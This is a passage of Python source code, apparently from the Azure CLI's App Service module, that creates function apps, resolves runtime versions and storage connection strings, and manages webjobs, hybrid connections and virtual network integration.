runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
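# e.g. functions_version '3' -> '~3'; defaults to '~2' when no version is given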
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
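# e.g. 'linuxFxVersion' -> 'linux_fx_version'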
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
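# Converts a runtime version string to a float for comparison using the Windows/Linux version regexes;
# falls back to float(version_string), or 0 if the string cannot be parsed.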
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
    # content share names should be up to 63 characters long, made of lowercase letters and digits, and random,
    # so take the first 50 characters of the app name and append the last 12 characters of a random uuid
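    # e.g. 'MyFunctionApp' -> 'myfunctionapp' plus 12 random hex characters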
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so it does not interfere with regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
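# Validate that the storage account exposes blob, queue and table endpoints and uses an allowed SKU,
# then build a connection string from its primary key and the cloud's storage endpoint suffix.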
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
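# Poll the Kudu deployment status URL every 2 seconds, for up to timeout/2 attempts (450 by default);
# a status of 3 means the deployment failed and 4 means it completed successfully.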
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensure the input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, True)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, False)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False,
is_webapp=True):
from azure.mgmt.web.models import SitePatchResource
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx)
if is_webapp:
app = show_webapp(cmd, resource_group_name, name, slot)
else:
app = show_functionapp(cmd, resource_group_name, name, slot)
parsed_plan = parse_resource_id(app.app_service_plan_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
subnet_id = subnet_info["subnet_resource_id"]
if not slot:
client.web_apps.update(resource_group_name=resource_group_name,
name=name,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
else:
client.web_apps.update_slot(resource_group_name=resource_group_name,
name=name,
slot=slot,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
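# Ensure the subnet is delegated to Microsoft.Web/serverFarms; when the subnet lives in a different
# subscription only a warning with the manual delegation command is emitted.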
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
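# Resolve the subnet to a full resource ID: accept a subnet resource ID as-is, build one from a vnet
# resource ID, or search the subscription's vnets by name (preferring one in the given resource group).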
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
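# High-level flow of webapp_up: detect the OS and runtime from the source directory (or from --runtime/--html),
# reuse the resource group and plan of an existing app or create new ones, always create-or-update the plan,
# create the webapp (or update its runtime), zip the current directory and zip-deploy it, then persist defaults.
# Example invocation (flag names assumed to mirror the parameters below): az webapp up --name <app> --dryrun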
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
